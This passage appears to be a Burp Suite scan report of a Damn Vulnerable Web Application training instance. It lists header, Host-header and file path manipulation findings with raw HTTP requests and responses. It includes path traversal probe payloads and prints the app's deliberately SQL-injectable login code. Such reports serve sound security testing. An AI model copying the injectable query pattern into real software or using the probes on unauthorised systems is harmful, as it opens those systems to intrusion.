<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: SQL Injection :: Damn Vulnerable Web Application (DVWA)</
...[SNIP]...
16.48. https://pentest-ground.com:4280/vulnerabilities/sqli_blind/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/sqli_blind/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /vulnerabilities/sqli_blind/?id=294674&Submit=Submit HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=9f28fa18f337425afc9aa892e78d492e
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/sqli_blind/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 404 Not Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:32 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4179
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: SQL Injection (Blind) :: Damn Vulnerable Web Application
...[SNIP]...
16.49. https://pentest-ground.com:4280/vulnerabilities/upload/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/upload/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
POST /vulnerabilities/upload/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=30dfe41b65fb094cfbdac447e96119cd
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/upload/
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryecNMX27PWG2QSiwV
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 401
------WebKitFormBoundaryecNMX27PWG2QSiwV
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
------WebKitFormBoundaryecNMX27PWG2QSiwV
Content-Disposition: form-data; name="uploaded"; fil
...[SNIP]...
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:13 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4050
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Upload :: Damn Vulnerable Web Application (DVWA)</ti
...[SNIP]...
16.50. https://pentest-ground.com:4280/vulnerabilities/view_help.php
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/view_help.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /vulnerabilities/view_help.php?id=brute&security=low&locale=en HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=e3e80b2e1e73cd41e7284684082f1165
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:12 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4235
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Help :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="st
...[SNIP]...
16.51. https://pentest-ground.com:4280/vulnerabilities/view_source.php
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/view_source.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /vulnerabilities/view_source.php?id=brute&security=low HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=0469bf99ed333ec9d4bed463704811d5
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:14 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 6531
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Damn Vulnerable Web Application (DVWA)Source :: Damn Vulnerable Web App
...[SNIP]...
16.52. https://pentest-ground.com:4280/vulnerabilities/weak_id/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/weak_id/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
POST /vulnerabilities/weak_id/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=816b74549ceec886dd90efed771fc842
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/weak_id/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:14 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 3427
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: dvwaSession=1
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Weak Session IDs :: Damn Vulnerable Web Application (DVWA
...[SNIP]...
16.53. https://pentest-ground.com:4280/vulnerabilities/xss_d/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/xss_d/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /vulnerabilities/xss_d/?default=Spanish HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d3b16130fb79125ad39c31a7a5f28589
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_d/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:18 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4612
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: DOM Based Cross Site Scripting (XSS) :: Damn Vulnerable W
...[SNIP]...
16.54. https://pentest-ground.com:4280/vulnerabilities/xss_s/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/xss_s/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
POST /vulnerabilities/xss_s/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=be26cfa0f1e58ad96599acf4fe963262
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_s/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 55
txtName=RUYsQw&mtxMessage=RUYsQw&btnSign=Sign+Guestbook
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4943
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Stored Cross Site Scripting (XSS) :: Damn Vulnerable Web
...[SNIP]...
17. Arbitrary host header accepted
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/fi/ |
Note: This issue was generated by the Burp extension: Active Scan++.
Issue detail
The application appears to be accessible using arbitrary HTTP Host headers.
This is a serious issue if the application is not externally accessible or uses IP-based access restrictions. Attackers can use DNS Rebinding to bypass any IP or firewall based access restrictions that may be in place, by proxying through their target's browser.
Note that modern web browsers' use of DNS pinning does not effectively prevent this attack. The only effective mitigation is server-side: https://bugzilla.mozilla.org/show_bug.cgi?id=689835#c13
Additionally, it may be possible to directly bypass poorly implemented access restrictions by sending a Host header of 'localhost'.
Resources:
- https://portswigger.net/web-security/host-header
Request 1
GET /vulnerabilities/fi/?page=file3.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=203536d9ff1aefc1bc842561eeb56926
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:49:42 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4448
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)<
...[SNIP]...
Request 2
GET /vulnerabilities/fi/?page=file3.php&cachebust=1729504256.81 HTTP/1.1
Host: eve58g.pentest-ground.com:4280
Cache-Control: no-cache
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=203536d9ff1aefc1bc842561eeb56926
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:50:56 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4455
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)<
...[SNIP]...
18. File path manipulation
Previous
Next
There are 3 instances of this issue:
Issue background
File path manipulation vulnerabilities arise when user-controllable data is placed into a file or URL path that is used on the server to access local resources, which may be within or outside the web root. If vulnerable, an attacker can modify the file path to access different resources, which may contain sensitive information. Even where an attack is constrained within the web root, it is often possible to retrieve items that are normally protected from direct access, such as application configuration files, the source code for server-executable scripts, or files with extensions that the web server is not configured to serve directly.
Issue remediation
Ideally, application functionality should be designed in such a way that user-controllable data does not need to be placed into file or URL paths in order to access local resources on the server. This can normally be achieved by referencing known files via an index number rather than their name.
If it is considered unavoidable to place user data into file or URL paths, the data should be strictly validated against a whitelist of accepted values. Note that when accessing resources within the web root, simply blocking input containing file path traversal sequences (such as dot-dot-slash) is not always sufficient to prevent retrieval of sensitive information, because some protected items may be accessible at the original path without using any traversal sequences.
References
Vulnerability classifications
18.1. https://pentest-ground.com:4280/vulnerabilities/view_help.php [id parameter]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/view_help.php |
Issue detail
The id parameter appears to be vulnerable to file path manipulation attacks.
The payload ./ihi/../brute was submitted in the id parameter. This returned the same content as the base request. The payload .../brute was then submitted, and this returned a different response. This indicates that the application may be vulnerable to file path manipulation.
Request 1
GET /vulnerabilities/view_help.php?id=.%2fihi%2f..%2fbrute&security=low&locale=en HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=3a4caf980e8226c982399504aa20892e
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:46:27 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4235
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Help :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="st
...[SNIP]...
<div class="body_padded">
<div class="body_padded">
<h1>Help - Brute Force (Login)</h1>
<div id="code">
<table width='100%' bgcolor='white' style="border:2px #C0C0C0 solid">
<tr>
<td><div id="code">
<h3>About</h3>
<p>Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system.
A common approach is to repeatedly try guesses for the password.</p>
<p>Users often choose weak passwords. Examples of insecure choices include single words found in dictionaries, family names, any too short password
(usually thought to be less than 6 or 7 characters), or predictable patterns
(e.g. alternating vowels and consonants, which is known as leetspeak, so "password" becomes "p@55w0rd").</p>
<p>Creating a targeted wordlists, which is generated towards the target, often gives the highest success rate. There are public tools out there that will create a dictionary
based on a combination of company websites, personal social networks and other common information (such as birthdays or year of graduation).
<p>A last resort is to try every possible password, known as a brute force attack. In theory, if there is no limit to the number of attempts, a brute force attack will always
be successful since the rules for acceptable passwords must be publicly known; but as the length of the password increases, so does the number of possible passwords
making the attack time longer.</p>
<br /><hr /><br />
<h3>Objective</h3>
<p>Your goal is to get the administrator...s password by brute forcing. Bonus points for getting the other four user passwords!</p>
<br /><hr /><br />
<h3>Low Level</h3>
<p>The developer has completely missed out <u>any protections methods</u>, allowing for anyone to try as many times as they wish, to login to any user without any repercussions.</p>
<br />
<h3>Medium Level</h3>
<p>This stage adds a sleep on the failed login screen. This mean when you login incorrectly, there will be an extra two second wait before the page is visible.</p>
<p>This will only slow down the amount of requests which can be processed a minute, making it longer to brute force.</p>
<br />
<h3>High Level</h3>
<p>There has been an "anti Cross-Site Request Forgery (CSRF) token" used. There is a old myth that this protection will stop brute force attacks. This is not the case.
This level also extends on the medium level, by waiting when there is a failed login but this time it is a random amount of time between two and four seconds.
The idea of this is to try and confuse any timing predictions.</p>
<p>Using a <a href="https://en.wikipedia.org/wiki/CAPTCHA" target="_blank">CAPTCHA</a> form could have a similar effect as a CSRF token.</p>
<br />
<h3>Impossible Level</h3>
<p>Brute force (and user enumeration) should not be possible in the impossible level. The developer has added a "lock out" feature, where if there are five bad logins within
the last 15 minutes, the locked out user cannot log in.</p>
<p>If the locked out user tries to login, even with a valid password, it will say their username or password is incorrect. This will make it impossible to know
if there is a valid account on the system, with that password, and if the account is locked.</p>
<p>This can cause a "Denial of Service" (DoS), by having someone continually trying to login to someone's account.
This level would need to be extended by blacklisting the attacker (e.g. IP address, country, user-agent).</p>
</div></td>
</tr>
</table>
</div>
<br />
<p>Reference: <a href="https://en.wikipedia.org/wiki/Password_cracking" target="_blank">https://en.wikipedia.org/wiki/Password_cracking</a></p>
</div>
</div>
...[SNIP]...
Request 2
GET /vulnerabilities/view_help.php?id=...%2fbrute&security=low&locale=en HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=3a4caf980e8226c982399504aa20892e
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:46:21 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 648
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Help :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="st
...[SNIP]...
<br />
<b>Warning</b>: file_get_contents(../vulnerabilities/.../brute/help/help.php): Failed to open stream: No such file or directory in <b>/var/www/html/vulnerabilities/view_help.php</b> on line <b>20</b><br />
</div>
...[SNIP]...
18.2. https://pentest-ground.com:4280/vulnerabilities/view_source.php [id parameter]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/view_source.php |
Issue detail
The id parameter appears to be vulnerable to file path manipulation attacks.
The payload ./fce/../brute was submitted in the id parameter. This returned the same content as the base request. The payload .../brute was then submitted, and this returned a different response. This indicates that the application may be vulnerable to file path manipulation.
Request 1
GET /vulnerabilities/view_source.php?id=.%2ffce%2f..%2fbrute&security=low HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=56125bcc235c28c9f2cdcb2bd7a6469c
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:49:58 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 6559
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Damn Vulnerable Web Application (DVWA)Source :: Damn Vulnerable Web App
...[SNIP]...
<code style="color: #000000"><span style="color: #0000BB"><?php
</span><span style="color: #007700">if( isset( </span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[ </span><span style="color: #DD0000">'Login' </span><span style="color: #007700">] ) ) {
</span><span style="color: #FF8000">// Get username
</span><span style="color: #0000BB">$user </span><span style="color: #007700">= </span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[ </span><span style="color: #DD0000">'username' </span><span style="color: #007700">];
</span><span style="color: #FF8000">// Get password
</span><span style="color: #0000BB">$pass </span><span style="color: #007700">= </span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[ </span><span style="color: #DD0000">'password' </span><span style="color: #007700">];
</span><span style="color: #0000BB">$pass </span><span style="color: #007700">= </span><span style="color: #0000BB">md5</span><span style="color: #007700">( </span><span style="color: #0000BB">$pass </span><span style="color: #007700">);
</span><span style="color: #FF8000">// Check the database
</span><span style="color: #0000BB">$query </span><span style="color: #007700">= </span><span style="color: #DD0000">"SELECT * FROM `users` WHERE user = '</span><span style="color: #0000BB">$user</span><span style="color: #DD0000">' AND password = '</span><span style="color: #0000BB">$pass</span><span style="color: #DD0000">';"</span><span style="color: #007700">;
</span><span style="color: #0000BB">$result </span><span style="color: #007700">= </span><span style="color: #0000BB">mysqli_query</span><span style="color: #007700">(</span><span style="color: #0000BB">$GLOBALS</span><span style="color: #007700">[</span><span style="color: #DD0000">"___mysqli_ston"</span><span style="color: #007700">], </span><span style="color: #0000BB">$query </span><span style="color: #007700">) or die( </span><span style="color: #DD0000">'<pre>' </span><span style="color: #007700">. ((</span><span style="color: #0000BB">is_object</span><span style="color: #007700">(</span><span style="color: #0000BB">$GLOBALS</span><span style="color: #007700">[</span><span style="color: #DD0000">"___mysqli_ston"</span><span style="color: #007700">])) ? </span><span style="color: #0000BB">mysqli_error</span><span style="color: #007700">(</span><span style="color: #0000BB">$GLOBALS</span><span style="color: #007700">[</span><span style="color: #DD0000">"___mysqli_ston"</span><span style="color: #007700">]) : ((</span><span style="color: #0000BB">$___mysqli_res </span><span style="color: #007700">= </span><span style="color: #0000BB">mysqli_connect_error</span><span style="color: #007700">()) ? </span><span style="color: #0000BB">$___mysqli_res </span><span style="color: #007700">: </span><span style="color: #0000BB">false</span><span style="color: #007700">)) . </span><span style="color: #DD0000">'</pre>' </span><span style="color: #007700">);
if( </span><span style="color: #0000BB">$result </span><span style="color: #007700">&& </span><span style="color: #0000BB">mysqli_num_rows</span><span style="color: #007700">( </span><span style="color: #0000BB">$result </span><span style="color: #007700">) == </span><span style="color: #0000BB">1 </span><span style="color: #007700">) {
</span><span style="color: #FF8000">// Get users details
</span><span style="color: #0000BB">$row </span><span style="color: #007700">= </span><span style="color: #0000BB">mysqli_fetch_assoc</span><span style="color: #007700">( </span><span style="color: #0000BB">$result </span><span style="color: #007700">);
</span><span style="color: #0000BB">$avatar </span><span style="color: #007700">= </span><span style="color: #0000BB">$row</span><span style="color: #007700">[</span><span style="color: #DD0000">"avatar"</span><span style="color: #007700">];
</span><span style="color: #FF8000">// Login successful
